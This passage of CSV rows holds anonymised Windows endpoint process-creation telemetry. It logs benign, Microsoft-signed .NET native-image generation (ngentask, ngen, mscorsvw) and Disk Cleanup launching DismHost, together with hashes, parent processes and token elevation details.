+109,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:56.918304400+00:00,6264,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:56.910313600+00:00,6852,ngentask.exe,"""NGenTask.exe"" /StopEvent:1332",False,2021-06-23 01:00:55.753380700+00:00,9384,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.930763+00:00,2021-06-23 01:03:43.207070200+00:00,308784e9-50ef-4bef-9c1f-bbbf29b2af1e,computerpii_0a470890c60768167990033d701e7bd881398861,156090,False,10.7740.19041.1052,False,11540474045172077,,11540474045172078,2021-06-23 01:00:56.910313600+00:00,6852,2021-06-23 01:00:56.910313600+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,6852,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+110,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:57.036293200+00:00,11848,ngentask.exe,"""NGenTask.exe"" /StopEvent:1348",PortableExecutable,2021-02-17 04:29:20.504956500+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,79312,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.768853+00:00,13440,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:672",True,2021-06-23 01:00:55.367532600+00:00,16324,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:57.161287800+00:00,2021-06-23 01:03:43.207724900+00:00,cdfafc11-30d3-47cc-9d50-ca63b548d377,computerpii_0a470890c60768167990033d701e7bd881398861,156098,False,10.7740.19041.1052,False,11540474045172059,,11540474045172079,2021-06-23 01:00:55.768853+00:00,13440,2021-06-23 01:00:55.768853+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,13440,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-23 01:00:55.782419200+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+111,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:57.042329800+00:00,5956,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:57.036293200+00:00,11848,ngentask.exe,"""NGenTask.exe"" /StopEvent:1348",False,2021-06-23 01:00:55.768853+00:00,13440,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:57.161694600+00:00,2021-06-23 01:03:43.207807900+00:00,c257fdab-8d99-4cc1-81a2-22dbe90ad353,computerpii_0a470890c60768167990033d701e7bd881398861,156099,False,10.7740.19041.1052,False,11540474045172079,,11540474045172080,2021-06-23 01:00:57.036293200+00:00,11848,2021-06-23 01:00:57.036293200+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,11848,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-23 01:00:55.782419200+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+112,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:57.132171900+00:00,13564,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1312",PortableExecutable,2021-02-17 04:29:20.532877500+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,79816,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.367532600+00:00,16324,taskhostw.exe,taskhostw.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:57.171040900+00:00,2021-06-23 01:03:43.207913100+00:00,6a11857a-10f7-4859-aa11-d5498f784798,computerpii_0a470890c60768167990033d701e7bd881398861,156100,False,10.7740.19041.1052,False,11540474045172035,,11540474045172081,2021-06-23 01:00:55.367532600+00:00,16324,2021-06-23 01:00:55.367532600+00:00,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,16324,128,ActiveProcessStartkey,C:\Windows\System32,97096,2081-06-21 11:10:49+00:00,2021-04-14 01:10:22.933876900+00:00,2021-06-23 01:00:55.369684500+00:00,2021-04-14 01:10:22.932389100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+113,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:57.157185100+00:00,6848,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:57.132171900+00:00,13564,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1312",True,2021-06-23 01:00:55.367532600+00:00,16324,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:57.171705+00:00,2021-06-23 01:03:43.207999200+00:00,c2930b26-3768-49ec-8f02-e955af8d8cfc,computerpii_0a470890c60768167990033d701e7bd881398861,156101,False,10.7740.19041.1052,False,11540474045172081,,11540474045172082,2021-06-23 01:00:57.132171900+00:00,13564,2021-06-23 01:00:57.132171900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,13564,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+114,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:57.272332100+00:00,20084,ngen.exe,"""ngen.exe"" RemoveTaskDelayStartTrigger /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:57.132171900+00:00,13564,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1312",True,2021-06-23 01:00:55.367532600+00:00,16324,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:57.305639100+00:00,2021-06-23 01:03:43.208431300+00:00,1ef6e9a0-45b2-4a94-b249-9082b1c8fb18,computerpii_0a470890c60768167990033d701e7bd881398861,156106,False,10.7740.19041.1052,False,11540474045172081,,11540474045172083,2021-06-23 01:00:57.132171900+00:00,13564,2021-06-23 01:00:57.132171900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,13564,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+115,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:57.315274500+00:00,12156,ngen.exe,"""ngen.exe"" ExecuteQueuedItems /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:57.132171900+00:00,13564,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1312",True,2021-06-23 01:00:55.367532600+00:00,16324,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:57.402941800+00:00,2021-06-23 01:03:43.210507700+00:00,d94fa912-db02-4b39-9dbd-1dc8df2662f5,computerpii_0a470890c60768167990033d701e7bd881398861,156130,False,10.7740.19041.1052,False,11540474045172081,,11540474045172084,2021-06-23 01:00:57.132171900+00:00,13564,2021-06-23 01:00:57.132171900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,13564,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+116,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:57.430371800+00:00,1656,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:57.132171900+00:00,13564,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1312",True,2021-06-23 01:00:55.367532600+00:00,16324,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:57.618647900+00:00,2021-06-23 01:03:43.213560700+00:00,ad0c2f5f-b155-4bdd-acbf-fd726d20f1f3,computerpii_0a470890c60768167990033d701e7bd881398861,156162,False,10.7740.19041.1052,False,11540474045172081,,11540474045172085,2021-06-23 01:00:57.132171900+00:00,13564,2021-06-23 01:00:57.132171900+00:00,ngentask.exe,13564,18688,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+117,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:57.460982800+00:00,16472,mscorsvw.exe,"mscorsvw.exe -StartupEvent 20c -InterruptEvent 0 -NGENProcess 1f8 -Pipe 208 -Comment ""NGen Worker Process""",PortableExecutable,2021-02-17 04:29:15.864371200+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe,125872,d7365b80e8951ddc95f3a8e3ac01d37d,3e5099f573601926e59862fba2495974688e72677c73f10e4c99e26a76cdcf37,0636347981cb05b74859ce7c841753da90ce679a,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:57.430371800+00:00,1656,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",True,2021-06-23 01:00:57.132171900+00:00,13564,ngentask.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:57.620711400+00:00,2021-06-23 01:03:43.213666300+00:00,1471a6ef-238f-4be7-b927-7755653b634c,computerpii_0a470890c60768167990033d701e7bd881398861,156163,False,10.7740.19041.1052,False,11540474045172085,,11540474045172087,2021-06-23 01:00:57.430371800+00:00,1656,2021-06-23 01:00:57.430371800+00:00,ngen.exe,1656,18688,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,144344,2020-12-02 21:00:07+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:57.434900100+00:00,2021-02-17 04:29:15.829464400+00:00,18688,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,mscorsvw.exe,mscorsvw.exe,.NET Runtime Optimization Service
+118,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 01:00:57.460287300+00:00,20456,DismHost.exe,dismhost.exe {ECA95E8F-FEE1-48D8-B08B-85ECF0D94D7D},PortableExecutable,2021-06-23 01:00:57.328150100+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\8801847E-3FFA-4C25-8307-7ABF1E544DAA\DismHost.exe,146256,e5d5e9c1f65b8ec7aa5b7f1b1acdd731,e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80,dbb14dcda6502ab1d23a7c77d405dafbcbeb439e,ef759fbf8aee871c4accac4a2ef8f9ee,87d5153bec20f9b2e61fb6c6e4f0e49e48ae50691912ce793a599299d31ef671,c94b3634bbf439181de566c1837969daa7b26f70,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:55.474643400+00:00,7680,cleanmgr.exe,cleanmgr.exe /autoclean /d C:,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:57.621110500+00:00,2021-06-23 01:03:43.213765700+00:00,568a355f-9856-485e-af37-f73024ecd411,computerpii_0a470890c60768167990033d701e7bd881398861,156164,False,10.7740.19041.1052,False,11540474045172053,,11540474045172086,2021-06-23 01:00:55.474643400+00:00,7680,2021-06-23 01:00:55.474643400+00:00,cleanmgr.exe,7680,256,ActiveProcessStartkey,C:\Windows\System32,320000,1983-10-25 17:51:00+00:00,2021-04-14 01:10:31.036813600+00:00,2021-06-23 01:00:55.469933300+00:00,2021-04-14 01:10:31.033943500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,CLEANMGR,CLEANMGR.DLL,Disk Space Cleanup Manager for Windows,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dismhost,DismHost.exe,Dism Host Servicing Process
+119,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:57.635969300+00:00,18572,ngentask.exe,"""NGenTask.exe"" /StopEvent:1364",PortableExecutable,2021-02-17 04:29:20.532877500+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,79816,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:57.132171900+00:00,13564,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1312",True,2021-06-23 01:00:55.367532600+00:00,16324,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:57.661179400+00:00,2021-06-23 01:03:43.213855600+00:00,8366a3e2-eba3-4b92-8b60-bc6ac31a4346,computerpii_0a470890c60768167990033d701e7bd881398861,156165,False,10.7740.19041.1052,False,11540474045172081,,11540474045172088,2021-06-23 01:00:57.132171900+00:00,13564,2021-06-23 01:00:57.132171900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,13564,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+120,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:57.647290200+00:00,8612,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:57.635969300+00:00,18572,ngentask.exe,"""NGenTask.exe"" /StopEvent:1364",False,2021-06-23 01:00:57.132171900+00:00,13564,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:57.661764200+00:00,2021-06-23 01:03:43.213958100+00:00,4e94c564-681c-45e3-a2e7-f673b800fd84,computerpii_0a470890c60768167990033d701e7bd881398861,156166,False,10.7740.19041.1052,False,11540474045172088,,11540474045172089,2021-06-23 01:00:57.635969300+00:00,18572,2021-06-23 